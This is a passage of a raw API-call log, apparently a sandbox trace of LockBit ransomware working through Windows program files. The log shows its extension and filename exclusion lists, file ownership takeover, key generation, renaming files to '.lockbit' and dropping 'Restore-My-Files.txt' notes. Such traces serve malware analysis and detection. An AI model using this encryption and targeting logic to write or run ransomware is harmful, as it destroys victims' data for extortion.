lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.367] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.367] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.367] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.367] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.367] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.367] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.367] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.367] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.367] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0080.367] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0080.367] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.367] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png") returned=".png" [0080.367] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.367] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.368] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.368] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.369] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.369] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png.lockbit") returned 94 [0080.369] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.370] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.370] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.370] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.371] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.371] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.371] RtlFreeAnsiString (AnsiString="\\") [0080.371] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.371] malloc (_Size=0x200) returned 0x77d800 [0080.371] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.371] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.371] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.371] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.372] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.372] CloseHandle (hObject=0x3a0) returned 1 [0080.372] free (_Block=0x77d800) [0080.372] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.373] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.373] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.373] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5088) returned 1 [0080.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.374] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.380] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.380] malloc (_Size=0xd2) returned 0x1ff1e60 [0080.384] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd2, FileInformationClass=0xa) returned 0xc0000008 [0080.384] free (_Block=0x1ff1e60) [0080.385] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.385] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.385] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.385] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0080.385] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.385] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.385] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0080.385] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.385] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.385] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.386] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.386] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.390] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.390] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.390] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.390] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.390] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.391] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0080.391] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0080.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\") returned="" [0080.391] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0080.391] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.391] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.391] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.391] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.392] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.392] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.392] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 100 [0080.392] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.398] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.398] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.398] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.399] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.399] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.399] RtlFreeAnsiString (AnsiString="\\") [0080.399] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0080.399] malloc (_Size=0x200) returned 0x77d800 [0080.399] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.399] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.399] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.399] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.400] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.400] CloseHandle (hObject=0x3a0) returned 1 [0080.400] free (_Block=0x77d800) [0080.400] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0080.400] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.400] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.401] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0080.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.402] ReadFile (in: hFile=0x3a0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.404] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.404] malloc (_Size=0xde) returned 0x1ff1e60 [0080.404] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xde, FileInformationClass=0xa) returned 0x0 [0080.404] free (_Block=0x1ff1e60) [0080.404] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 1 [0080.404] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt") returned 74 [0080.404] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.405] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0080.405] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.405] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.405] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0080.405] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.405] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.405] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.406] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.406] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.407] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.407] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0080.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0080.407] lstrcmpiW (lpString1="autorun.inf", 